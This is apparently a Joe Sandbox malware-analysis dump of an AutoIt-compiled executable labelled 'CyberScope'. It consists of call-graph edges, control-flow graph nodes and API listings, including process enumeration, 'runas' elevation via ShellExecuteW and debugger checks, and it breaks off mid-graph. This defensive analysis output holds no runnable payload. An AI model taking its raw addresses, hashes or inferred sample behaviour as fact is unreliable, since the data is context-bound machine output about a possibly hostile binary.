BuildCatchObjectHelperInternal 105354->105355 105356 1bf09b 105355->105356 105357 1bf086 105355->105357 105367 1b94fd EnterCriticalSection 105356->105367 105373 1bf649 20 API calls _abort 105357->105373 105360 1bf08b 105374 1c2b5c 26 API calls _abort 105360->105374 105361 1bf0a7 105368 1bf0db 105361->105368 105366 1bf096 __fread_nolock 105367->105361 105376 1bf106 105368->105376 105370 1bf0e8 105372 1bf0b4 105370->105372 105396 1bf649 20 API calls _abort 105370->105396 105375 1bf0d1 LeaveCriticalSection __fread_nolock 105372->105375 105373->105360 105374->105366 105375->105366 105377 1bf12e 105376->105377 105378 1bf114 105376->105378 105380 1bdcc5 __fread_nolock 26 API calls 105377->105380 105400 1bf649 20 API calls _abort 105378->105400 105381 1bf137 105380->105381 105397 1c9789 105381->105397 105382 1bf119 105401 1c2b5c 26 API calls _abort 105382->105401 105386 1bf23b 105388 1bf248 105386->105388 105391 1bf1ee 105386->105391 105387 1bf1bf 105390 1bf1dc 105387->105390 105387->105391 105403 1bf649 20 API calls _abort 105388->105403 105402 1bf41f 31 API calls 4 library calls 105390->105402 105394 1bf124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 105391->105394 105404 1bf29b 30 API calls 2 library calls 105391->105404 105393 1bf1e6 105393->105394 105394->105370 105396->105372 105405 1c9606 105397->105405 105399 1bf153 105399->105386 105399->105387 105399->105394 105400->105382 105401->105394 105402->105393 105403->105394 105404->105394 105406 1c9612 BuildCatchObjectHelperInternal 105405->105406 105407 1c961a 105406->105407 105408 1c9632 105406->105408 105431 1bf636 20 API calls _abort 105407->105431 105409 1c96e6 105408->105409 105413 1c966a 105408->105413 105436 1bf636 20 API calls _abort 105409->105436 105412 1c961f 105432 1bf649 20 API calls _abort 105412->105432 105430 1c54ba EnterCriticalSection 105413->105430 105414 1c96eb 105437 1bf649 20 API calls _abort 105414->105437 105418 1c9627 __fread_nolock 105418->105399 105419 1c9670 105421 1c96a9 105419->105421 105422 1c9694 105419->105422 105420 1c96f3 105438 1c2b5c 26 API calls _abort 105420->105438 105425 1c970b __fread_nolock 28 API calls 105421->105425 105433 1bf649 20 API calls _abort 105422->105433 105427 1c96a4 105425->105427 105426 1c9699 105434 1bf636 20 API calls _abort 105426->105434 105435 1c96de LeaveCriticalSection __wsopen_s 105427->105435 105430->105419 105431->105412 105432->105418 105433->105426 105434->105427 105435->105418 105436->105414 105437->105420 105438->105418 105439 19f4c0 105442 1aa025 105439->105442 105441 19f4cc 105443 1aa046 105442->105443 105448 1aa0a3 105442->105448 105445 1a0340 191 API calls 105443->105445 105443->105448 105449 1aa077 105445->105449 105446 1e806b 105446->105446 105447 1aa0e7 105447->105441 105448->105447 105451 203fe1 82 API calls __wsopen_s 105448->105451 105449->105447 105449->105448 105450 19bed9 22 API calls 105449->105450 105450->105448 105451->105446 105452 191044 105457 192793 105452->105457 105454 19104a 105492 1b0413 29 API calls __onexit 105454->105492 105456 191054 105493 192a38 105457->105493 105461 19280a 105462 19bf73 22 API calls 105461->105462 105463 192814 105462->105463 105464 19bf73 22 API calls 105463->105464 105465 19281e 105464->105465 105466 19bf73 22 API calls 105465->105466 105467 192828 105466->105467 105468 19bf73 22 API calls 105467->105468 105469 192866 105468->105469 105470 19bf73 22 API calls 105469->105470 105471 192932 105470->105471 105503 192dbc 105471->105503 105475 192964 105476 19bf73 22 API calls 105475->105476 105477 19296e 105476->105477 105478 1a3160 9 API calls 105477->105478 105479 192999 105478->105479 105530 193166 105479->105530 105481 1929b5 105482 1929c5 GetStdHandle 105481->105482 105483 192a1a 105482->105483 105484 1d39e7 105482->105484 105486 192a27 OleInitialize 105483->105486 105484->105483 105485 1b014b 22 API calls 105484->105485 105487 1d39f7 105485->105487 105486->105454 105537 200ac4 InitializeCriticalSectionAndSpinCount 105487->105537 105489 1d3a00 105540 2012eb 105489->105540 105492->105456 105543 192a91 105493->105543 105496 192a91 22 API calls 105497 192a70 105496->105497 105498 19bf73 22 API calls 105497->105498 105499 192a7c 105498->105499 105500 198577 22 API calls 105499->105500 105501 1927c9 105500->105501 105502 19327e 6 API calls 105501->105502 105502->105461 105504 19bf73 22 API calls 105503->105504 105505 192dcc 105504->105505 105506 19bf73 22 API calls 105505->105506 105507 192dd4 105506->105507 105550 1981d6 105507->105550 105510 1981d6 22 API calls 105511 192de4 105510->105511 105512 19bf73 22 API calls 105511->105512 105513 192def 105512->105513 105514 1b014b 22 API calls 105513->105514 105515 19293c 105514->105515 105516 193205 105515->105516 105517 193213 105516->105517 105518 19bf73 22 API calls 105517->105518 105519 19321e 105518->105519 105520 19bf73 22 API calls 105519->105520 105521 193229 105520->105521 105522 19bf73 22 API calls 105521->105522 105523 193234 105522->105523 105524 19bf73 22 API calls 105523->105524 105525 19323f 105524->105525 105526 1981d6 22 API calls 105525->105526 105527 19324a 105526->105527 105528 1b014b 22 API calls 105527->105528 105529 193251 RegisterWindowMessageW 105528->105529 105529->105475 105531 1d3c8f 105530->105531 105532 193176 105530->105532 105553 203c4e 22 API calls 105531->105553 105533 1b014b 22 API calls 105532->105533 105535 19317e 105533->105535 105535->105481 105536 1d3c9a 105554 200d18 105537->105554 105541 2012f9 CreateThread 105540->105541 105542 1d3a0c CloseHandle 105540->105542 105541->105542 105557 2012d1 105541->105557 105542->105483 105544 19bf73 22 API calls 105543->105544 105545 192a9c 105544->105545 105546 19bf73 22 API calls 105545->105546 105547 192aa4 105546->105547 105548 19bf73 22 API calls 105547->105548 105549 192a66 105548->105549 105549->105496 105551 19bf73 22 API calls 105550->105551 105552 192ddc 105551->105552 105552->105510 105553->105536 105555 200b03 InterlockedExchange 105554->105555 105556 200d26 GetCurrentProcess GetCurrentProcess DuplicateHandle 105554->105556 105555->105489 105556->105555 105558 2012e0 105557->105558 105559 2012db 105557->105559 105561 201196 InterlockedExchange 105559->105561 105562 2011c1 105561->105562 105563 2011c7 105561->105563 105565 1b017b 22 API calls 105562->105565 105564 1b017b 22 API calls 105563->105564 105566 2011d9 ReadFile 105564->105566 105565->105563 105567 2011fc 105566->105567 105568 2012a8 105566->105568 105567->105568 105569 201206 EnterCriticalSection 105567->105569 105571 20122e __fread_nolock 105567->105571 105570 2012c1 InterlockedExchange 105568->105570 105569->105567 105569->105571 105570->105558 105572 201279 LeaveCriticalSection ReadFile 105571->105572 105573 1b017b 22 API calls 105571->105573 105572->105567 105572->105568 105573->105571 105574 1c8782 105579 1c853e 105574->105579 105577 1c87aa 105580 1c856f try_get_first_available_module 105579->105580 105587 1c86b8 105580->105587 105594 1b917b 40 API calls 2 library calls 105580->105594 105582 1c876e 105598 1c2b5c 26 API calls _abort 105582->105598 105584 1c86c3 105584->105577 105591 1d0d04 105584->105591 105586 1c870c 105586->105587 105595 1b917b 40 API calls 2 library calls 105586->105595 105587->105584 105597 1bf649 20 API calls _abort 105587->105597 105589 1c872b 105589->105587 105596 1b917b 40 API calls 2 library calls 105589->105596 105599 1d0401 105591->105599 105593 1d0d1f 105593->105577 105594->105586 105595->105589 105596->105587 105597->105582 105598->105584 105601 1d040d BuildCatchObjectHelperInternal 105599->105601 105600 1d041b 105657 1bf649 20 API calls _abort 105600->105657 105601->105600 105603 1d0454 105601->105603 105610 1d09db 105603->105610 105604 1d0420 105658 1c2b5c 26 API calls _abort 105604->105658 105608 1d042a __fread_nolock 105608->105593 105660 1d07af 105610->105660 105613 1d0a0d 105692 1bf636 20 API calls _abort 105613->105692 105614 1d0a26 105678 1c5594 105614->105678 105617 1d0a12 105693 1bf649 20 API calls _abort 105617->105693 105618 1d0a2b 105619 1d0a4b 105618->105619 105620 1d0a34 105618->105620 105691 1d071a CreateFileW 105619->105691 105694 1bf636 20 API calls _abort 105620->105694 105624 1d0a39 105695 1bf649 20 API calls _abort 105624->105695 105626 1d0b01 GetFileType 105627 1d0b0c GetLastError 105626->105627 105628 1d0b53 105626->105628 105698 1bf613 20 API calls __dosmaperr 105627->105698 105700 1c54dd 21 API calls 2 library calls 105628->105700 105629 1d0ad6 GetLastError 105697 1bf613 20 API calls __dosmaperr 105629->105697 105631 1d0a84 105631->105626 105631->105629 105696 1d071a CreateFileW 105631->105696 105633 1d0b1a CloseHandle 105633->105617 105635 1d0b43 105633->105635 105699 1bf649 20 API calls _abort 105635->105699 105637 1d0ac9 105637->105626 105637->105629 105639 1d0b74 105641 1d0bc0 105639->105641 105701 1d092b 72 API calls 3 library calls 105639->105701 105640 1d0b48 105640->105617 105645 1d0bed 105641->105645 105702 1d04cd 72 API calls 4 library calls 105641->105702 105644 1d0be6 105644->105645 105646 1d0bfe 105644->105646 105703 1c8a2e 105645->105703 105648 1d0478 105646->105648 105649 1d0c7c CloseHandle 105646->105649 105659 1d04a1 LeaveCriticalSection __wsopen_s 105648->105659 105718 1d071a CreateFileW 105649->105718 105651 1d0ca7 105652 1d0cb1 GetLastError 105651->105652 105653 1d0cdd 105651->105653 105719 1bf613 20 API calls __dosmaperr 105652->105719 105653->105648 105655 1d0cbd 105720 1c56a6 21 API calls 2 library calls 105655->105720 105657->105604 105658->105608 105659->105608 105661 1d07ea 105660->105661 105662 1d07d0 105660->105662 105721 1d073f 105661->105721 105662->105661 105728 1bf649 20 API calls _abort 105662->105728 105665 1d07df 105729 1c2b5c 26 API calls _abort 105665->105729 105667 1d0822 105668 1d0851 105667->105668 105730 1bf649 20 API calls _abort 105667->105730 105677 1d08a4 105668->105677 105732 1bda7d 26 API calls 2 library calls 105668->105732 105671 1d089f 105673 1d091e 105671->105673 105671->105677 105672 1d0846 105731 1c2b5c 26 API calls _abort 105672->105731 105733 1c2b6c 11 API calls _abort 105673->105733 105676 1d092a 105677->105613 105677->105614 105679 1c55a0 BuildCatchObjectHelperInternal 105678->105679 105736 1c32d1 EnterCriticalSection 105679->105736 105681 1c55a7 105683 1c55cc 105681->105683 105687 1c563a EnterCriticalSection 105681->105687 105689 1c55ee 105681->105689 105684 1c5373 __wsopen_s 21 API calls 105683->105684 105686 1c55d1 105684->105686 105685 1c5617 __fread_nolock 105685->105618 105686->105689 105740 1c54ba EnterCriticalSection 105686->105740 105687->105689 105690 1c5647 LeaveCriticalSection 105687->105690 105737 1c569d 105689->105737 105690->105681 105691->105631 105692->105617 105693->105648 105694->105624 105695->105617 105696->105637 105697->105617 105698->105633 105699->105640 105700->105639 105701->105641 105702->105644 105704 1c5737 __wsopen_s 26 API calls 105703->105704 105706 1c8a3e 105704->105706 105705 1c8a44 105742 1c56a6 21 API calls 2 library calls 105705->105742 105706->105705 105709 1c5737 __wsopen_s 26 API calls 105706->105709 105717 1c8a76 105706->105717 105708 1c8a9c 105711 1c8abe 105708->105711 105743 1bf613 20 API calls __dosmaperr 105708->105743 105712 1c8a6d 105709->105712 105710 1c5737 __wsopen_s 26 API calls 105713 1c8a82 CloseHandle 105710->105713 105711->105648 105715 1c5737 __wsopen_s 26 API calls 105712->105715 105713->105705 105716 1c8a8e GetLastError 105713->105716 105715->105717 105716->105705 105717->105705 105717->105710 105718->105651 105719->105655 105720->105653 105724 1d0757 105721->105724 105722 1d0772 105722->105667 105724->105722 105734 1bf649 20 API calls _abort 105724->105734 105725 1d0796 105735 1c2b5c 26 API calls _abort 105725->105735 105727 1d07a1 105727->105667 105728->105665 105729->105661 105730->105672 105731->105668 105732->105671 105733->105676 105734->105725 105735->105727 105736->105681 105741 1c3319 LeaveCriticalSection 105737->105741 105739 1c56a4 105739->105685 105740->105689 105741->105739 105742->105708 105743->105711 105744 1d2782 105747 192ab0 105744->105747 105748 192aef mciSendStringW 105747->105748 105749 1d3a1a DestroyWindow 105747->105749 105750 192b0b 105748->105750 105751 192d66 105748->105751 105760 1d3a26 105749->105760 105752 192b19 105750->105752 105750->105760 105751->105750 105753 192d75 UnregisterHotKey 105751->105753 105783 192ede 105752->105783 105753->105751 105755 1d3a44 FindClose 105755->105760 105757 1d3a6b 105761 1d3a8f 105757->105761 105762 1d3a7e FreeLibrary 105757->105762 105758 197aab CloseHandle 105758->105760 105759 192b2e 105759->105761 105766 192b3c 105759->105766 105760->105755 105760->105757 105760->105758 105763 1d3aa3 VirtualFree 105761->105763 105764 1d3ad1 105761->105764 105762->105757 105763->105761 105768 192ba9 105764->105768 105787 200b4c 105764->105787 105765 192b98 CoUninitialize 105765->105764 105765->105768 105766->105765 105769 1d3aeb 105768->105769 105771 192bb4 105768->105771 105775 1d3afa messages 105769->105775 105794 203d30 6 API calls messages 105769->105794 105770 192bc4 105792 192ff4 24 API calls 105770->105792 105771->105770 105773 192bda 105793 192e1c 22 API calls 105773->105793 105778 1d3b89 105775->105778 105795 1f6e3b 22 API calls messages 105775->105795 105778->105778 105784 192eeb 105783->105784 105785 192b20 105784->105785 105796 1f7991 22 API calls 105784->105796 105785->105757 105785->105759 105797 201312 105787->105797 105790 200b7f DeleteCriticalSection 105790->105768 105791 200b6b 105791->105790 105792->105773 105794->105769 105795->105775 105796->105784 105798 20131b InterlockedExchange 105797->105798 105799 200b5a CloseHandle 105797->105799 105798->105799 105800 20132f EnterCriticalSection TerminateThread WaitForSingleObject 105798->105800 105799->105791 105801 201369 InterlockedExchange LeaveCriticalSection 105800->105801 105802 20135c CloseHandle 105800->105802 105801->105799 105802->105801

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 458 195fc8-196037 call 19bf73 GetVersionExW call 198577 463 1d507d-1d5090 458->463 464 19603d 458->464 465 1d5091-1d5095 463->465 466 19603f-196041 464->466 467 1d5098-1d50a4 465->467 468 1d5097 465->468 469 1d50bc 466->469 470 196047-1960a6 call 19adf4 call 1955dc 466->470 467->465 471 1d50a6-1d50a8 467->471 468->467 475 1d50c3-1d50cf 469->475 482 1960ac-1960ae 470->482 483 1d5224-1d522b 470->483 471->466 474 1d50ae-1d50b5 471->474 474->463 477 1d50b7 474->477 478 19611c-196136 GetCurrentProcess IsWow64Process 475->478 477->469 480 196138 478->480 481 196195-19619b 478->481 484 19613e-19614a 480->484 481->484 487 1d5125-1d5138 482->487 488 1960b4-1960b7 482->488 485 1d522d 483->485 486 1d524b-1d524e 483->486 489 1d5269-1d526d GetSystemInfo 484->489 490 196150-19615f LoadLibraryA 484->490 494 1d5233 485->494 495 1d5239-1d5241 486->495 496 1d5250-1d525f 486->496 491 1d513a-1d5143 487->491 492 1d5161-1d5163 487->492 488->478 493 1960b9-1960f5 488->493 497 19619d-1961a7 GetSystemInfo 490->497 498 196161-19616f GetProcAddress 490->498 500 1d5145-1d514b 491->500 501 1d5150-1d515c 491->501 503 1d5198-1d519b 492->503 504 1d5165-1d517a 492->504 493->478 502 1960f7-1960fa 493->502 494->495 495->486 496->494 505 1d5261-1d5267 496->505 499 196177-196179 497->499 498->497 506 196171-196175 GetNativeSystemInfo 498->506 507 19617b-19617c FreeLibrary 499->507 508 196182-196194 499->508 500->478 501->478 509 1d50d4-1d50e4 502->509 510 196100-19610a 502->510 513 1d519d-1d51b8 503->513 514 1d51d6-1d51d9 503->514 511 1d517c-1d5182 504->511 512 1d5187-1d5193 504->512 505->495 506->499 507->508 516 1d50f7-1d5101 509->516 517 1d50e6-1d50f2 509->517 510->475 518 196110-196116 510->518 511->478 512->478 519 1d51ba-1d51c0 513->519 520 1d51c5-1d51d1 513->520 514->478 515 1d51df-1d5206 514->515 521 1d5208-1d520e 515->521 522 1d5213-1d521f 515->522 523 1d5114-1d5120 516->523 524 1d5103-1d510f 516->524 517->478 518->478 519->478 520->478 521->478 522->478 523->478 524->478
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 00195FF7
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    • GetCurrentProcess.KERNEL32(?,0022DC2C,00000000,?,?), ref: 00196123
                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 0019612A
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00196155
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00196167
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00196175
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0019617C
                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 001961A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                    • API String ID: 3290436268-3101561225
                                                                                    • Opcode ID: 1769d6185f5b1d8ee50cc386d9c19c83bc2a7d83d4ff35072f163122d4699c89
                                                                                    • Instruction ID: 26f65a953dc1ada27f2975575d94831e489c1f5776716c2b4d21990c6dbd1cc6
                                                                                    • Opcode Fuzzy Hash: 1769d6185f5b1d8ee50cc386d9c19c83bc2a7d83d4ff35072f163122d4699c89
                                                                                    • Instruction Fuzzy Hash: B7A1A53190AAC0DFCB15DB687C8D5A57FA57B76300B09E8E9E48097362C3AD45ACCB31

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00193368,?), ref: 001933BB
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00193368,?), ref: 001933CE
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00262418,00262400,?,?,?,?,?,?,00193368,?), ref: 0019343A
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                      • Part of subcall function 0019425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00193462,00262418,?,?,?,?,?,?,?,00193368,?), ref: 001942A0
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00262418,?,?,?,?,?,?,?,00193368,?), ref: 001934BB
                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 001D3CB0
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00262418,?,?,?,?,?,?,?,00193368,?), ref: 001D3CF1
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002531F4,00262418,?,?,?,?,?,?,?,00193368), ref: 001D3D7A
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 001D3D81
                                                                                      • Part of subcall function 001934D3: GetSysColorBrush.USER32(0000000F), ref: 001934DE
                                                                                      • Part of subcall function 001934D3: LoadCursorW.USER32(00000000,00007F00), ref: 001934ED
                                                                                      • Part of subcall function 001934D3: LoadIconW.USER32(00000063), ref: 00193503
                                                                                      • Part of subcall function 001934D3: LoadIconW.USER32(000000A4), ref: 00193515
                                                                                      • Part of subcall function 001934D3: LoadIconW.USER32(000000A2), ref: 00193527
                                                                                      • Part of subcall function 001934D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0019353F
                                                                                      • Part of subcall function 001934D3: RegisterClassExW.USER32(?), ref: 00193590
                                                                                      • Part of subcall function 001935B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001935E1
                                                                                      • Part of subcall function 001935B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00193602
                                                                                      • Part of subcall function 001935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00193368,?), ref: 00193616
                                                                                      • Part of subcall function 001935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00193368,?), ref: 0019361F
                                                                                      • Part of subcall function 0019396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00193A3C
                                                                                    Strings
                                                                                    • runas, xrefs: 001D3D75
                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 001D3CAA
                                                                                    • AutoIt, xrefs: 001D3CA5
                                                                                    • 0$&, xrefs: 00193495
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                    • String ID: 0$&$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                    • API String ID: 683915450-2392259895
                                                                                    • Opcode ID: fa94fffa183dade613bd4bfbb8e7475101206704d696cd4df99ba7d3fb2b87c0
                                                                                    • Instruction ID: 65aed7a3a40ba41bfc888ec7d9417c53bd2d20b061e3580f7b9bda1f7b065d8f
                                                                                    • Opcode Fuzzy Hash: fa94fffa183dade613bd4bfbb8e7475101206704d696cd4df99ba7d3fb2b87c0
                                                                                    • Instruction Fuzzy Hash: 7B510830108340EADF15EF60EC49D6E7BA9AFA5744F00042DF492532A2DF648A9EDB62
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 001FDDAC
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 001FDDBA
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 001FDDDA
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 001FDE87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: 2b70a95eb9dee7cd05f3492c5458f5fa7d0de5aa99925c14c5e66f1805e37cf4
                                                                                    • Instruction ID: d0664f19d3c0902962b61878169d433b0f0bc69e390d9ef5f9603a5873a149c7
                                                                                    • Opcode Fuzzy Hash: 2b70a95eb9dee7cd05f3492c5458f5fa7d0de5aa99925c14c5e66f1805e37cf4
                                                                                    • Instruction Fuzzy Hash: FF31A271008304AFD710EF50EC85ABFBBE9AFA9344F14092DF685871A1DB719A49CB92
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000003,?,001B502E,00000003,002598D8,0000000C,001B5185,00000003,00000002,00000000,?,001C2C59,00000003), ref: 001B5079
                                                                                    • TerminateProcess.KERNEL32(00000000,?,001B502E,00000003,002598D8,0000000C,001B5185,00000003,00000002,00000000,?,001C2C59,00000003), ref: 001B5080
                                                                                    • ExitProcess.KERNEL32 ref: 001B5092
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 11dcfa3919c725c7d604526e592575e636c8a85d73c7c8e4a47368675ba37bc5
                                                                                    • Instruction ID: 970a57b05486f1969851c09faea5ef25403a5db81d01d720bcb3b852f0e490ac
                                                                                    • Opcode Fuzzy Hash: 11dcfa3919c725c7d604526e592575e636c8a85d73c7c8e4a47368675ba37bc5
                                                                                    • Instruction Fuzzy Hash: CBE0B631000548AFCF22BFA4ED0DE983B6AEB65395F114054F8499A561DB75DD53CAC0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 1aac3e-1ab063 call 198ec0 call 1abc58 call 19e6a0 7 1ab069-1ab073 0->7 8 1e8584-1e8591 0->8 11 1ab079-1ab07e 7->11 12 1e896b-1e8979 7->12 9 1e8596-1e85a5 8->9 10 1e8593 8->10 13 1e85aa 9->13 14 1e85a7 9->14 10->9 17 1e85b2-1e85b4 11->17 18 1ab084-1ab090 call 1ab5b6 11->18 15 1e897e 12->15 16 1e897b 12->16 13->17 14->13 19 1e8985-1e898e 15->19 16->15 24 1e85bd 17->24 18->24 25 1ab096-1ab0a3 call 19c98d 18->25 22 1e8993 19->22 23 1e8990 19->23 28 1e899c-1e89eb call 19e6a0 call 1abbbe * 2 22->28 23->22 27 1e85c7 24->27 31 1ab0ab-1ab0b4 25->31 32 1e85cf-1e85d2 27->32 62 1ab1e0-1ab1f5 28->62 63 1e89f1-1e8a03 call 1ab5b6 28->63 35 1ab0b8-1ab0d6 call 1b4d98 31->35 36 1ab158-1ab16f 32->36 37 1e85d8-1e8600 call 1b4cd3 call 197ad5 32->37 56 1ab0d8-1ab0e1 35->56 57 1ab0e5 35->57 40 1e8954-1e8957 36->40 41 1ab175 36->41 72 1e862d-1e8651 call 197b1a call 19bd98 37->72 73 1e8602-1e8606 37->73 45 1e895d-1e8960 40->45 46 1e8a41-1e8a79 call 19e6a0 call 1abbbe 40->46 47 1e88ff-1e8920 call 19e6a0 41->47 48 1ab17b-1ab17e 41->48 45->28 53 1e8962-1e8965 45->53 46->62 105 1e8a7f-1e8a91 call 1ab5b6 46->105 47->62 77 1e8926-1e8938 call 1ab5b6 47->77 54 1e8729-1e8743 call 1abbbe 48->54 55 1ab184-1ab187 48->55 53->12 53->62 82 1e888f-1e88b5 call 19e6a0 54->82 83 1e8749-1e874c 54->83 64 1e86ca-1e86e0 call 196c03 55->64 65 1ab18d-1ab190 55->65 56->35 66 1ab0e3 56->66 57->27 68 1ab0eb-1ab0fc 57->68 79 1ab1fb-1ab20b call 19e6a0 62->79 80 1e8ac9-1e8acf 62->80 96 1e8a2f-1e8a3c call 19c98d 63->96 97 1e8a05-1e8a0d 63->97 64->62 94 1e86e6-1e86fc call 1ab5b6 64->94 75 1e8656-1e8659 65->75 76 1ab196-1ab1b8 call 19e6a0 65->76 66->68 68->12 78 1ab102-1ab11c 68->78 72->75 73->72 87 1e8608-1e862b call 19ad40 73->87 75->12 93 1e865f-1e8674 call 196c03 75->93 76->62 113 1ab1ba-1ab1cc call 1ab5b6 76->113 116 1e893a-1e8943 call 19c98d 77->116 117 1e8945 77->117 78->32 92 1ab122-1ab154 call 1abbbe call 19e6a0 78->92 80->31 85 1e8ad5 80->85 82->62 139 1e88bb-1e88cd call 1ab5b6 82->139 103 1e874e-1e8751 83->103 104 1e87bf-1e87de call 19e6a0 83->104 85->12 87->72 87->73 92->36 93->62 136 1e867a-1e8690 call 1ab5b6 93->136 142 1e86fe-1e870b call 198ec0 94->142 143 1e870d-1e8716 call 198ec0 94->143 149 1e8ac2-1e8ac4 96->149 111 1e8a1e-1e8a29 call 19b4b1 97->111 112 1e8a0f-1e8a13 97->112 119 1e8ada-1e8ae8 103->119 120 1e8757-1e8774 call 19e6a0 103->120 104->62 141 1e87e4-1e87f6 call 1ab5b6 104->141 153 1e8ab5-1e8abe call 19c98d 105->153 154 1e8a93-1e8a9b 105->154 111->96 159 1e8b0b-1e8b19 111->159 112->111 129 